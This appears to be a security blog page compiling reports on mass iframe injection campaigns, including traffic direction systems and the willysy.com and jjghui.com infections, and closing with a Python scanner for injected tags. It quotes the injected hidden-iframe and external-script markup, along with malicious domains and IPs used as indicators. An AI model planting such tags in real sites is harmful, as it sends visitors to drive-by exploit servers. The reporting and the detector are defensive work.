
Mass Iframe injections used to drive traffic | Traffic Direction System [TDS]


Security researchers at Sophos noticed a rise in the volume of Mal/Iframe-Gen detections. A number of sites were infected using the iframe injection technique. These infected sites are used to drive traffic to other websites (mostly malware sites).


Despite the obfuscation, Sophos products proactively block these malicious scripts as Mal/Iframe-Gen. As suggested from the threat name, the payload of the injected script is to write an iframe to the page:

The iframe points to what appears to be a 'middleman' server, used to bounce the traffic elsewhere. This is commonly known as a Traffic Direction System (TDS). The TDS server is under the control of the attackers, enabling them to configure it to redirect user traffic to wherever required.

At first, the injected iframe redirected to a freshly registered domain (hosted in Germany). However, the page was unavailable, with all requests returning a 404 error. This was a little surprising given that the attack was new (you expect 404s for old, stale attacks where the compromised sites persist long after the target payload servers have been shut down).

Later, the TDS server was updated to redirect the traffic to a new destination. At the time of writing it is redirecting the traffic to a Blackhole exploit pack site, where the victim is bombarded with the usual Flash, Java and PDF exploits.

The illustration below gives an overview of this attack, and the role that the TDS server plays in it.

This attack provides us with a perfect illustration of how user traffic is a commodity. Once they have injected numerous sites to redirect to their TDS, the attackers can essentially sell that user traffic to interested parties willing to pay for victims to hit their exploit sites.

As ever, protection from this form of attack consists of several components:
  • detection of the malicious redirects injected into the legitimate sites (in this case, proactive detection as Mal/Iframe-Gen).
  • URL filtering to block requests to the TDS. Thus far, a few different servers are being used in these attacks.
  • URL filtering to block requests to the final destination servers.
  • detection of the exploit site itself (Mal/ExpJS-N) and the various malicious files it uses.
  • detection of the final payload (which will vary as the final destination server changes).
  • if all else has failed, runtime protection (HIPS) to catch the malicious payload running on the victim's machine.

Another Mass IFrame Injection Attack | 350,000 ASP sites infected

Another mass iframe injection attack has been detected by armorize.com researchers. In July they detected a mass iframe injection that infected 90,000 websites. This time the number of sites has increased: 350,000 websites are infected by malware. The attack also targets websites developed using ASP.NET.


As per the Google results, 180,000 websites are infected by this iframe injection attack. The attackers targeted victims who use 6 particular languages on their websites: English, German, French, Italian, Polish, and Breton.
If you want to check the list of infected sites, do a Google search for "http://jjghui.com/urchin.js". Never click the websites returned by Google for this search; they will launch the malware attack.

Malware Infection:
The malicious script inserted into the victim's website causes the visiting browser to load an iframe, first from www3.strongdefenseiz.in and then from www2.safetosecurity.rr.nu.
Multiple browser-based drive-by download exploits are served depending on the visiting browser.

When the user is redirected to the malware server, it serves malware to the visitor. The malware is installed automatically, without the user's knowledge, if the visitor has an outdated browsing platform (browser, Adobe PDF, Adobe Flash, Java, etc.).

Currently, 6 out of 43 antivirus vendors on VirusTotal detect the dropped malware.

jjghui.com resolves to IP 146.185.248.3 (AS3999), which is in Russia. www3.strongdefenseiz.in resolves to 75.102.21.121 (AS36352), which is in the US and hosted by HostForWeb.com. www2.safetosecurity.rr.nu resolves to IP 67.208.74.71 (AS33597), which is in the US and hosted by InfoRelayOnlineSystems.

The dropped malware attempts to connect to: 65.98.83.115 (AS25653), which is in the US.


IFrame Injection:
They inserted the iframe into the webpage by exploiting a web application vulnerability, like this:
<script src="Link_to_malicious_script"></script>

This inserts the malicious JavaScript into the website. The script generates an iframe to www3.strongdefenseiz.in, which returns an HTTP 302 redirect to the exploit server at www2.safetosecurity.rr.nu.

Security tips from BreakTheSecurity.com for web masters:
If your site is also infected, delete all files from your server. I hope you have a backup of your website contents. Install the latest antivirus on your system. Verify your code before uploading.

90000 Web Pages Infected by Mass IFrame Injection

Security experts Wayne Huang, Chris Hsiao and NightCola Lin discovered a massive iframe attack on e-commerce websites. More than 90,000 websites are infected by this attack. All infected websites point to willysy.com.

Google indicates more than 90,000 infected pages (note: pages, not domains).


Massive Injection:
Initially the injected code was:

<iframe src="hxxp://willysy.com/images/banners/" style="position: absolute; visibility: hidden;"></iframe>

Later it became:
<script src="hxxp://exero.eu/catalog/jquery.js">
</script>

As per Armorize, the infected websites redirect to other malware domains and download malware to the client system.
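The three posts on this page describe two shapes of injected code: a hidden iframe (the willysy.com form) and a script tag that pulls JavaScript from an attacker domain (the exero.eu and jjghui.com forms). The following scanner is an added example written for this page; it is not code from the original posts, from Sophos or from Armorize. It walks HTML files and flags iframes styled to be invisible, plus any iframe or script whose src host is not on the site's own allowlist, with the hostnames quoted in the posts above treated as known-bad indicators. The ALLOWED_HOSTS set and the two sample pages are assumptions constructed for the demonstration.

```python
"""Scan HTML for injected hidden iframes and third-party script includes.

Added example for this page; not the posts' own code. Assumptions: the site's
legitimate hostnames are listed in ALLOWED_HOSTS, and the sample pages at the
bottom are constructed, not captured from a real site.
"""
import re
import sys
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hostnames that legitimately serve this site's content (assumption for the demo).
ALLOWED_HOSTS = {"example.com", "www.example.com"}

# Hostnames quoted as indicators in the posts on this page.
KNOWN_BAD_HOSTS = {
    "willysy.com",
    "exero.eu",
    "jjghui.com",
    "www3.strongdefenseiz.in",
    "www2.safetosecurity.rr.nu",
}

# CSS used to keep an injected iframe out of sight.
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)


def _host(url):
    """Return the lowercase host of an absolute or protocol-relative URL, else None."""
    if not url:
        return None
    url = url.strip()
    if url.startswith("//"):
        url = "http:" + url  # protocol-relative include, treat as external
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return None  # inline script, relative path, data: URI, etc.
    return parsed.hostname


class InjectionScanner(HTMLParser):
    """Collect suspicious <iframe> and <script> start tags while parsing."""

    def __init__(self):
        super().__init__()
        self.findings = []  # list of (reason, src) tuples

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = dict(attrs)
        src = a.get("src")
        # An iframe that is deliberately invisible is suspicious regardless of host.
        if tag == "iframe" and HIDDEN_STYLE.search(a.get("style") or ""):
            self.findings.append(("hidden-iframe", src))
        host = _host(src)
        if host is None:
            return
        if host in KNOWN_BAD_HOSTS:
            self.findings.append(("known-bad-host", src))
        elif host not in ALLOWED_HOSTS:
            # Unknown third-party host: not proof of compromise, but worth review.
            self.findings.append(("external-" + tag, src))


def scan_html(html):
    """Return the list of findings for one HTML document."""
    parser = InjectionScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def scan_files(paths):
    """Return {path: findings} for every file that produced at least one finding."""
    report = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings = scan_html(fh.read())
        if findings:
            report[path] = findings
    return report


# Constructed sample pages using the tag shapes quoted in the posts above.
CLEAN_PAGE = (
    '<html><body><script src="https://www.example.com/js/app.js"></script>'
    "<p>Welcome</p></body></html>"
)
INFECTED_PAGE = (
    "<html><body><p>Shop</p>"
    '<iframe src="http://willysy.com/images/banners/" '
    'style="position: absolute; visibility: hidden;"></iframe>'
    '<script src="http://exero.eu/catalog/jquery.js"></script>'
    "</body></html>"
)

if __name__ == "__main__":
    targets = sys.argv[1:]
    if targets:
        for path, findings in scan_files(targets).items():
            for reason, src in findings:
                print(f"{path}: {reason}: {src}")
    else:
        print("clean sample:", scan_html(CLEAN_PAGE))
        print("infected sample:", scan_html(INFECTED_PAGE))
```

Run it with no arguments to see the two samples scored, or pass the files of a web root (for example the output of `find /var/www -name '*.aspx' -o -name '*.html'`) to triage a site before restoring from backup. A hit on "external-script" only means a host outside the allowlist, so a legitimate CDN will show up until it is added to ALLOWED_HOSTS; "hidden-iframe" and "known-bad-host" are the findings that match the injections described on this page.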

Screenshots of Infected Pages: [images not included in this extract]

Video: [not included in this extract]

Source: Armorize